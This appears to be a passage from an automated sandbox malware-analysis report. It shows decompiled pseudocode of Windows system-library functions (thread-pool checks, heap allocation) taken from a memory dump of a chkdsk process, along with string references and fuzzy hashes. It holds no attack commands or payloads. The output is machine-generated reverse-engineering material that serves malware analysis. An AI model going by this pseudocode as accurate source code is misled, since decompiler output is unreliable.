								_push( &_v92);
								_v92 = 0xc0000710;
								_v76 = 2;
								L058A8A60(_t123, _t126);
								_push(4);
								_v100 = 0;
								_push( &_v100);
								_push(5);
								_push(0xfffffffe);
								_t83 = E05892A60();
							}
						}
						_t126 =  *(_t121 + 0x38);
						if((_t126 & 0x00000010) == 0 && E05856929() != 0) {
							_push( *((intOrPtr*)(_t121 + 0x34)));
							E058DEF10(0x54, 0, "ThreadPool: callback %p(%p) returned with a transaction uncleared\n",  *((intOrPtr*)(_t121 + 0x30)));
							E05898F40( &_v92, 0, _t131);
							_t138 = _t138 + 0x20;
							_v92 = 0xc000071d;
							_v76 = 0;
							_push( &_v92);
							_t83 = L058A8A60(_t123, _t126);
							_t126 =  *(_t121 + 0x38);
						}
						if((_t126 & 0x00000020) == 0) {
							_t123 =  *[fs:0x18];
							_t100 =  *((intOrPtr*)( *[fs:0x30] + 0xa0));
							_t83 =  *(_t100 + 0xc);
							if( *(_t100 + 0xc) ==  *((intOrPtr*)( *[fs:0x18] + 0x24))) {
								_push( *((intOrPtr*)(_t121 + 0x34)));
								E058DEF10(0x54, 0, "ThreadPool: callback %p(%p) returned with the loader lock held\n",  *((intOrPtr*)(_t121 + 0x30)));
								E05898F40( &_v92, 0, _t131);
								_t138 = _t138 + 0x20;
								_v92 = 0xc000071e;
								_v76 = 0;
								_push( &_v92);
								_t83 = L058A8A60(_t123, _t126);
								_t126 =  *(_t121 + 0x38);
							}
						}
						if((_t126 & 0x00000040) == 0) {
							_t83 =  *[fs:0x18];
							if( *((intOrPtr*)( *[fs:0x18] + 0xfb8)) != 0) {
								_push( *((intOrPtr*)(_t121 + 0x34)));
								E058DEF10(0x54, 0, "ThreadPool: callback %p(%p) returned with preferred languages set\n",  *((intOrPtr*)(_t121 + 0x30)));
								E05898F40( &_v92, 0, _t131);
								_t138 = _t138 + 0x20;
								_v92 = 0xc000071f;
								_v76 = 0;
								_push( &_v92);
								_t83 = L058A8A60(_t123, _t126);
								_t126 =  *(_t121 + 0x38);
							}
						}
						if(_t126 >= 0) {
							_t83 =  *[fs:0x18];
							if( *((intOrPtr*)( *[fs:0x18] + 0xf88)) != 0) {
								_push( *((intOrPtr*)(_t121 + 0x34)));
								E058DEF10(0x54, 0, "ThreadPool: callback %p(%p) returned with background priorities set\n",  *((intOrPtr*)(_t121 + 0x30)));
								E05898F40( &_v92, 0, _t131);
								_t138 = _t138 + 0x20;
								_v92 = 0xc0000720;
								_v76 = 0;
								_push( &_v92);
								_t83 = L058A8A60(_t123, _t126);
							}
						}
					}
					goto L15;
				}
			}
























                                                                                                                    0x058563cb
                                                                                                                    0x058563d3
                                                                                                                    0x058563db
                                                                                                                    0x058563dd
                                                                                                                    0x058563e2
                                                                                                                    0x058563e8
                                                                                                                    0x058564d4
                                                                                                                    0x058564d8
                                                                                                                    0x058564d9
                                                                                                                    0x058564da
                                                                                                                    0x058564e5
                                                                                                                    0x058563ee
                                                                                                                    0x0585640e
                                                                                                                    0x05856415
                                                                                                                    0x05856416
                                                                                                                    0x05856417
                                                                                                                    0x0585641a
                                                                                                                    0x0585641e
                                                                                                                    0x05856422
                                                                                                                    0x05856427
                                                                                                                    0x0585642c
                                                                                                                    0x058b0d22
                                                                                                                    0x058b0d28
                                                                                                                    0x058b0d29
                                                                                                                    0x058b0d2b
                                                                                                                    0x058b0d34
                                                                                                                    0x058b0d3a
                                                                                                                    0x058b0d45
                                                                                                                    0x058b0d4f
                                                                                                                    0x058b0d4f
                                                                                                                    0x058b0d34
                                                                                                                    0x05856436
                                                                                                                    0x058b0d5e
                                                                                                                    0x058b0d64
                                                                                                                    0x058b0d66
                                                                                                                    0x058b0d6b
                                                                                                                    0x058b0d6b
                                                                                                                    0x058b0d5e
                                                                                                                    0x0585643f
                                                                                                                    0x058b0d78
                                                                                                                    0x058b0d7f
                                                                                                                    0x058b0d84
                                                                                                                    0x058b0d84
                                                                                                                    0x058b0d78
                                                                                                                    0x05856445
                                                                                                                    0x0585644a
                                                                                                                    0x05856459
                                                                                                                    0x05856461
                                                                                                                    0x05856468
                                                                                                                    0x058b0d90
                                                                                                                    0x058b0d9d
                                                                                                                    0x058b0da5
                                                                                                                    0x058b0da8
                                                                                                                    0x058b0daf
                                                                                                                    0x058b0db7
                                                                                                                    0x058b0db8
                                                                                                                    0x058b0dc0
                                                                                                                    0x058b0dc8
                                                                                                                    0x058b0dcd
                                                                                                                    0x058b0dd3
                                                                                                                    0x058b0dd7
                                                                                                                    0x058b0dd8
                                                                                                                    0x058b0dda
                                                                                                                    0x058b0ddc
                                                                                                                    0x058b0ddc
                                                                                                                    0x058b0d90
                                                                                                                    0x0585646e
                                                                                                                    0x05856474
                                                                                                                    0x058b0de6
                                                                                                                    0x058b0df4
                                                                                                                    0x058b0e03
                                                                                                                    0x058b0e08
                                                                                                                    0x058b0e0b
                                                                                                                    0x058b0e17
                                                                                                                    0x058b0e1b
                                                                                                                    0x058b0e1c
                                                                                                                    0x058b0e21
                                                                                                                    0x058b0e21
                                                                                                                    0x05856486
                                                                                                                    0x0585648e
                                                                                                                    0x05856495
                                                                                                                    0x0585649b
                                                                                                                    0x058564a1
                                                                                                                    0x058b0e29
                                                                                                                    0x058b0e37
                                                                                                                    0x058b0e46
                                                                                                                    0x058b0e4b
                                                                                                                    0x058b0e4e
                                                                                                                    0x058b0e5a
                                                                                                                    0x058b0e5e
                                                                                                                    0x058b0e5f
                                                                                                                    0x058b0e64
                                                                                                                    0x058b0e64
                                                                                                                    0x058564a1
                                                                                                                    0x058564aa
                                                                                                                    0x058564ac
                                                                                                                    0x058564b8
                                                                                                                    0x058b0e6c
                                                                                                                    0x058b0e7a
                                                                                                                    0x058b0e89
                                                                                                                    0x058b0e8e
                                                                                                                    0x058b0e91
                                                                                                                    0x058b0e9d
                                                                                                                    0x058b0ea1
                                                                                                                    0x058b0ea2
                                                                                                                    0x058b0ea7
                                                                                                                    0x058b0ea7
                                                                                                                    0x058564b8
                                                                                                                    0x058564c0
                                                                                                                    0x058564c2
                                                                                                                    0x058564ce
                                                                                                                    0x058b0eaf
                                                                                                                    0x058b0ebd
                                                                                                                    0x058b0ecc
                                                                                                                    0x058b0ed1
                                                                                                                    0x058b0ed4
                                                                                                                    0x058b0ee0
                                                                                                                    0x058b0ee4
                                                                                                                    0x058b0ee5
                                                                                                                    0x058b0ee5
                                                                                                                    0x058564ce
                                                                                                                    0x058564c0
                                                                                                                    0x00000000
                                                                                                                    0x0585644a

                                                                                                                    Strings
                                                                                                                    • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 058B0E2F
                                                                                                                    • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 058B0DEC
                                                                                                                    • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 058B0EB5
                                                                                                                    • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 058B0E72
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                                                                    • API String ID: 0-1468400865
                                                                                                                    • Opcode ID: 3955e9f48d48c68f7188d91dde1b8043ab0911c6d2b9242248e20b8db8e3f70f
                                                                                                                    • Instruction ID: f1e87f502112b5ca3078b98d740ee13b0b1267fe89a3b88e1a847ca52d5dde2a
                                                                                                                    • Opcode Fuzzy Hash: 3955e9f48d48c68f7188d91dde1b8043ab0911c6d2b9242248e20b8db8e3f70f
                                                                                                                    • Instruction Fuzzy Hash: CF71E272A043059FDB61DF15C888FA77BA9AF85764F440568FC49CA246D334E984CFD2
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0584F5C7 Relevance: 5.2, Strings: 4, Instructions: 188COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 73%
                                                                                                                    			E0584F5C7(void* __ecx, void* __edx) {
				char _v36;
				char _v40;
				void* _v44;
				void* _v48;
				void* _v60;
				void* _v64;
				void* _v72;
				void* _v76;
				void* __ebx;
				intOrPtr _t63;
				void* _t66;
				signed int _t73;
				void* _t77;
				void* _t78;
				signed char* _t81;
				intOrPtr _t82;
				signed char* _t87;
				intOrPtr _t88;
				void* _t89;
				signed char* _t92;
				signed char _t98;
				void* _t110;
				void* _t130;
				void* _t136;
				signed int _t138;
				void* _t140;

				_t140 = (_t138 & 0xfffffff8) - 0x24;
				_t110 = __edx;
				_t136 = __ecx;
				E0584F858(__edx,  &_v36,  &_v40);
				if(E058868EA( *((intOrPtr*)(_t136 + 0x1f8)) -  *((intOrPtr*)(_t136 + 0x244)), _t136, _t136 + 0xd4) == 0) {
					_t128 = 0xc000012d;
					L17:
					_t63 =  *[fs:0x30];
					 *((intOrPtr*)(_t136 + 0x228)) =  *((intOrPtr*)(_t136 + 0x228)) + 1;
					__eflags =  *(_t63 + 0xc);
					if( *(_t63 + 0xc) == 0) {
						_push("HEAP: ");
						E0584B910();
					} else {
						E0584B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push(_v40);
					_push(_v36);
					_push(_t136);
					E0584B910("ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)\n", _t128);
					_t66 = 0;
					L15:
					return _t66;
				}
				if(( *(_t136 + 0x40) & 0x00040000) != 0) {
					_t130 = 0x40;
					_push(0);
					_push(0x1c);
					_push(_t140 + 0x1c);
					_push(3);
					_push(_t136);
					_push(0xffffffff);
					_t73 = E05892BE0();
					__eflags = _t73;
					if(_t73 < 0) {
						L22:
						E05915FED(0, _t136, 1,  *((intOrPtr*)(_t140 + 0x20)), 0, 0);
						goto L2;
					}
					__eflags =  *(_t140 + 0x18) & 0x00000060;
					if(( *(_t140 + 0x18) & 0x00000060) == 0) {
						goto L22;
					}
					__eflags =  *((intOrPtr*)(_t140 + 0x14)) - _t136;
					if( *((intOrPtr*)(_t140 + 0x14)) == _t136) {
						L3:
						_push(_t130);
						_push(0x1000);
						_push( &_v40);
						_push(0);
						_push( &_v36);
						_push(0xffffffff);
						_t77 = E05892B10();
						_t128 = _t77;
						if(_t77 < 0) {
							goto L17;
						}
						_t78 = E05863C40();
						_t131 = 0x7ffe0380;
						if(_t78 != 0) {
							_t81 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
						} else {
							_t81 = 0x7ffe0380;
						}
						if( *_t81 != 0) {
							_t82 =  *[fs:0x30];
							__eflags =  *(_t82 + 0x240) & 0x00000001;
							if(( *(_t82 + 0x240) & 0x00000001) != 0) {
								E0590EFD3(_t110, _t136, _v36, _v40, 8);
							}
						}
						 *((intOrPtr*)(_t136 + 0x240)) =  *((intOrPtr*)(_t136 + 0x240)) - 1;
						 *((intOrPtr*)(_t136 + 0x244)) =  *((intOrPtr*)(_t136 + 0x244)) - _v40;
						if(E05863C40() != 0) {
							_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
						} else {
							_t87 = _t131;
						}
						if( *_t87 != 0) {
							_t88 =  *[fs:0x30];
							__eflags =  *(_t88 + 0x240) & 0x00000001;
							if(( *(_t88 + 0x240) & 0x00000001) != 0) {
								__eflags = E05863C40();
								if(__eflags != 0) {
									_t131 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
									__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
								}
								E0590F1C3(_t110, _t136, _v36, __eflags, _v40,  *(_t136 + 0x74) << 3,  *_t131 & 0x000000ff);
							}
						}
						_t89 = E05863C40();
						_t132 = 0x7ffe038a;
						if(_t89 != 0) {
							_t92 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
						} else {
							_t92 = 0x7ffe038a;
						}
						if( *_t92 != 0) {
							__eflags = E05863C40();
							if(__eflags != 0) {
								_t132 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
								__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
							}
							E0590F1C3(_t110, _t136, _v36, __eflags, _v40,  *(_t136 + 0x74) << 3,  *_t132 & 0x000000ff);
						}
						 *((intOrPtr*)(_t136 + 0x21c)) =  *((intOrPtr*)(_t136 + 0x21c)) + 1;
						_t98 =  *(_t110 + 2);
						if((_t98 & 0x00000004) != 0) {
							E058A8140(_v36, _v40, 0xfeeefeee);
							_t98 =  *(_t110 + 2);
						}
						 *(_t110 + 2) = _t98 & 0x00000017;
						_t66 = 1;
						goto L15;
					}
					goto L22;
				}
				L2:
				_t130 = 4;
				goto L3;
			}





























                                                                                                                    0x0584f5cf
                                                                                                                    0x0584f5d9
                                                                                                                    0x0584f5e0
                                                                                                                    0x0584f5e3
                                                                                                                    0x0584f607
                                                                                                                    0x058ae162
                                                                                                                    0x058ae167
                                                                                                                    0x058ae167
                                                                                                                    0x058ae16d
                                                                                                                    0x058ae173
                                                                                                                    0x058ae177
                                                                                                                    0x058ae2dd
                                                                                                                    0x058ae2e2
                                                                                                                    0x058ae17d
                                                                                                                    0x058ae192
                                                                                                                    0x058ae197
                                                                                                                    0x058ae2e8
                                                                                                                    0x058ae2ec
                                                                                                                    0x058ae2f0
                                                                                                                    0x058ae2f7
                                                                                                                    0x058ae2ff
                                                                                                                    0x0584f6ba
                                                                                                                    0x0584f6c0
                                                                                                                    0x0584f6c0
                                                                                                                    0x0584f614
                                                                                                                    0x058ae19f
                                                                                                                    0x058ae1a0
                                                                                                                    0x058ae1a2
                                                                                                                    0x058ae1a8
                                                                                                                    0x058ae1a9
                                                                                                                    0x058ae1ab
                                                                                                                    0x058ae1ac
                                                                                                                    0x058ae1ae
                                                                                                                    0x058ae1b3
                                                                                                                    0x058ae1b5
                                                                                                                    0x058ae1c8
                                                                                                                    0x058ae1d6
                                                                                                                    0x00000000
                                                                                                                    0x058ae1d6
                                                                                                                    0x058ae1b7
                                                                                                                    0x058ae1bc
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x058ae1be
                                                                                                                    0x058ae1c2
                                                                                                                    0x0584f61d
                                                                                                                    0x0584f61d
                                                                                                                    0x0584f61e
                                                                                                                    0x0584f627
                                                                                                                    0x0584f628
                                                                                                                    0x0584f62e
                                                                                                                    0x0584f62f
                                                                                                                    0x0584f631
                                                                                                                    0x0584f636
                                                                                                                    0x0584f63a
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0584f640
                                                                                                                    0x0584f645
                                                                                                                    0x0584f64c
                                                                                                                    0x058ae1e9
                                                                                                                    0x0584f652
                                                                                                                    0x0584f652
                                                                                                                    0x0584f652
                                                                                                                    0x0584f657
                                                                                                                    0x058ae1f3
                                                                                                                    0x058ae1f9
                                                                                                                    0x058ae200
                                                                                                                    0x058ae212
                                                                                                                    0x058ae212
                                                                                                                    0x058ae200
                                                                                                                    0x0584f661
                                                                                                                    0x0584f667
                                                                                                                    0x0584f674
                                                                                                                    0x058ae225
                                                                                                                    0x0584f67a
                                                                                                                    0x0584f67a
                                                                                                                    0x0584f67a
                                                                                                                    0x0584f67f
                                                                                                                    0x058ae22f
                                                                                                                    0x058ae235
                                                                                                                    0x058ae23c
                                                                                                                    0x058ae247
                                                                                                                    0x058ae249
                                                                                                                    0x058ae254
                                                                                                                    0x058ae254
                                                                                                                    0x058ae254
                                                                                                                    0x058ae26f
                                                                                                                    0x058ae26f
                                                                                                                    0x058ae23c
                                                                                                                    0x0584f685
                                                                                                                    0x0584f68a
                                                                                                                    0x0584f691
                                                                                                                    0x058ae282
                                                                                                                    0x0584f697
                                                                                                                    0x0584f697
                                                                                                                    0x0584f697
                                                                                                                    0x0584f69c
                                                                                                                    0x058ae291
                                                                                                                    0x058ae293
                                                                                                                    0x058ae29e
                                                                                                                    0x058ae29e
                                                                                                                    0x058ae29e
                                                                                                                    0x058ae2b9
                                                                                                                    0x058ae2b9
                                                                                                                    0x0584f6a2
                                                                                                                    0x0584f6a8
                                                                                                                    0x0584f6ad
                                                                                                                    0x058ae2d0
                                                                                                                    0x058ae2d5
                                                                                                                    0x058ae2d5
                                                                                                                    0x0584f6b5
                                                                                                                    0x0584f6b8
                                                                                                                    0x00000000
                                                                                                                    0x0584f6b8
                                                                                                                    0x00000000
                                                                                                                    0x058ae1c2
                                                                                                                    0x0584f61a
                                                                                                                    0x0584f61c
                                                                                                                    0x00000000

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: InitializeThunk
                                                                                                                    • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                                                                                                    • API String ID: 2994545307-2586055223
                                                                                                                    • Opcode ID: 1b3600325159ec1812431789b5e8029e7b75d097a13b25a1e83498357f76082e
                                                                                                                    • Instruction ID: 7effcab6a41f617943f7ee1ac00e0a584bfbae43249d3db3ae287d2d1e2b9bf7
                                                                                                                    • Opcode Fuzzy Hash: 1b3600325159ec1812431789b5e8029e7b75d097a13b25a1e83498357f76082e
                                                                                                                    • Instruction Fuzzy Hash: DA61E232208744AFE721DB68C948F27B7EAFB84754F040859FE55CB291D634ED40CB62
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 058490F8 Relevance: 5.1, Strings: 4, Instructions: 100COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
                                                                                                                    • API String ID: 0-1391187441
                                                                                                                    • Opcode ID: 6304d6ac3f7e621c7f6e03fd4e4d810993cbcb5ed19c478e21f674087b731729
                                                                                                                    • Instruction ID: 30e9f09bb9fd6b4007bd4eda39887d77c6de2c96b7bc0ac50e87be00b094ac20
                                                                                                                    • Opcode Fuzzy Hash: 6304d6ac3f7e621c7f6e03fd4e4d810993cbcb5ed19c478e21f674087b731729
                                                                                                                    • Instruction Fuzzy Hash: B531C236A00218FFDB11EB58CC89FAABBB9FB446A0F144061EC15EB291D774ED40DE61
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 058D166E Relevance: 5.1, Strings: 4, Instructions: 85COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 100%
                                                                                                                    			E058D166E(intOrPtr __ecx) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _t19;
				void* _t23;
				intOrPtr _t26;
				intOrPtr _t29;
				intOrPtr _t30;
				intOrPtr _t38;
				void* _t42;
				intOrPtr _t43;
				intOrPtr _t44;
				void* _t46;
				void* _t47;
				void* _t48;

				_t44 = __ecx;
				_t30 = 0;
				_v16 = __ecx;
				_t42 =  *((intOrPtr*)(__ecx + 0x54)) +  *((intOrPtr*)( *[fs:0x30] + 8)) + 0xffffffd4;
				_t19 = E05899EB0(_t42, "BoG_ *90.0&!!  Yy>", 0x13);
				_t48 = _t47 + 0xc;
				if(_t19 != 0 ||  *((intOrPtr*)(_t42 + 0x20)) > 3) {
					_t43 = 1;
					_v8 = 1;
					_t46 = _t44 + 0x18 + ( *(_t44 + 0x14) & 0x0000ffff);
					_v12 = _t30;
					if(0 <  *(_v16 + 6)) {
						while(1) {
							_t23 = E05899EB0(_t46, "stxt371", 9);
							_t48 = _t48 + 0xc;
							if(_t23 == 0) {
								goto L12;
							}
							if(_t43 != 0) {
								_t29 = E05899EB0(_t46, ".txt", 6);
								_t48 = _t48 + 0xc;
								_t43 = _t29;
							}
							_t26 = _v8;
							if(_t26 != 0) {
								_t26 = E05899EB0(_t46, ".txt2", 7);
								_t48 = _t48 + 0xc;
								_v8 = _t26;
							}
							if(_t43 != 0 || _t26 != 0) {
								_t46 = _t46 + 0x28;
								_t38 = _v12 + 1;
								_v12 = _t38;
								if(_t38 < ( *(_v16 + 6) & 0x0000ffff)) {
									continue;
								} else {
								}
							} else {
								goto L12;
							}
							goto L13;
						}
						goto L12;
					}
				} else {
					L12:
					_t30 = 1;
					 *( *[fs:0x30] + 3) =  *( *[fs:0x30] + 3) | 0x00000008;
				}
				L13:
				return _t30;
			}


















                                                                                                                    0x058d167e
                                                                                                                    0x058d1680
                                                                                                                    0x058d1689
                                                                                                                    0x058d1691
                                                                                                                    0x058d1699
                                                                                                                    0x058d16a0
                                                                                                                    0x058d16a6
                                                                                                                    0x058d16b2
                                                                                                                    0x058d16b7
                                                                                                                    0x058d16ba
                                                                                                                    0x058d16bc
                                                                                                                    0x058d16c8
                                                                                                                    0x058d16ca
                                                                                                                    0x058d16d2
                                                                                                                    0x058d16d7
                                                                                                                    0x058d16dc
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x058d16e0
                                                                                                                    0x058d16ea
                                                                                                                    0x058d16ef
                                                                                                                    0x058d16f2
                                                                                                                    0x058d16f2
                                                                                                                    0x058d16f4
                                                                                                                    0x058d16f9
                                                                                                                    0x058d1703
                                                                                                                    0x058d1708
                                                                                                                    0x058d170b
                                                                                                                    0x058d170b
                                                                                                                    0x058d1710
                                                                                                                    0x058d1719
                                                                                                                    0x058d171f
                                                                                                                    0x058d1720
                                                                                                                    0x058d1729
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x058d172b
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x058d1710
                                                                                                                    0x00000000
                                                                                                                    0x058d16ca
                                                                                                                    0x058d172d
                                                                                                                    0x058d172d
                                                                                                                    0x058d1733
                                                                                                                    0x058d1741
                                                                                                                    0x058d1741
                                                                                                                    0x058d1746
                                                                                                                    0x058d174a

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: .txt$.txt2$BoG_ *90.0&!! Yy>$stxt371
                                                                                                                    • API String ID: 0-1880532218
                                                                                                                    • Opcode ID: 6cf472258ee52b22bcbc15761ab670f99d340f67ae9d9ba5ce2a56c6197d87c5
                                                                                                                    • Instruction ID: 3d7e68056dd0b8d5ae3636a871df29d55229af74e9b755127d19547d7eab2bc2
                                                                                                                    • Opcode Fuzzy Hash: 6cf472258ee52b22bcbc15761ab670f99d340f67ae9d9ba5ce2a56c6197d87c5
                                                                                                                    • Instruction Fuzzy Hash: F3214832B41200ABCB15CB59D84ABAEF3F6AF84A04F08406DEC45E7341EB79DD05C7A1
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 058F9060 Relevance: 4.3, Strings: 3, Instructions: 558COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: $ $0
                                                                                                                    • API String ID: 0-3352262554
                                                                                                                    • Opcode ID: cddd20a8034956a091c0572055a141494a05f92cba1432131e515ca054a7c282
                                                                                                                    • Instruction ID: d12c0a71d8f3a9b500eb2d8447e84c9273f13e67590e46023e71585f800c1cca
                                                                                                                    • Opcode Fuzzy Hash: cddd20a8034956a091c0572055a141494a05f92cba1432131e515ca054a7c282
                                                                                                                    • Instruction Fuzzy Hash: 723213B16083858FD754CF68C884B5BBBE5BB88348F04492EFA99C7250D775E948CF52
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 05860680 Relevance: 4.2, Strings: 3, Instructions: 414COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                                                    • API String ID: 0-4253913091
                                                                                                                    • Opcode ID: 9023a0fc5f1dc23d66d3540e5913576a985d3a70862268b5f5ff228553e5c437
                                                                                                                    • Instruction ID: 1680ec130b6888fa311c6087e4e415068f1d91548af6877323e9518bf6a1b892
                                                                                                                    • Opcode Fuzzy Hash: 9023a0fc5f1dc23d66d3540e5913576a985d3a70862268b5f5ff228553e5c437
                                                                                                                    • Instruction Fuzzy Hash: 8CF19A70A04609DFEB15CF68C889FAAB7B6FB44304F148168E816DB391D774ED81CB95
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 058E3608 Relevance: 4.1, Strings: 3, Instructions: 398COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: LdrpResSearchResourceHandle Enter$LdrpResSearchResourceHandle Exit$PE
                                                                                                                    • API String ID: 0-1168191160
                                                                                                                    • Opcode ID: 05017f4c11a09b9d1c8852d5a7a78d567265bd1d7caabd5afa7bef2383e69710
                                                                                                                    • Instruction ID: 90a6d308279ec9516cec7520d6b8571b548fab185b435c9d9775d053d612dae6
                                                                                                                    • Opcode Fuzzy Hash: 05017f4c11a09b9d1c8852d5a7a78d567265bd1d7caabd5afa7bef2383e69710
                                                                                                                    • Instruction Fuzzy Hash: 41F172B1A042288BDB21DF18CC94BA9B3B5FF46714F1448E9DD09E7240EB31AE85CF59
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 05851380 Relevance: 4.1, Strings: 3, Instructions: 385COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    • HEAP[%wZ]: , xrefs: 05851632
                                                                                                                    • HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 05851648
                                                                                                                    • HEAP: , xrefs: 058514B6
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
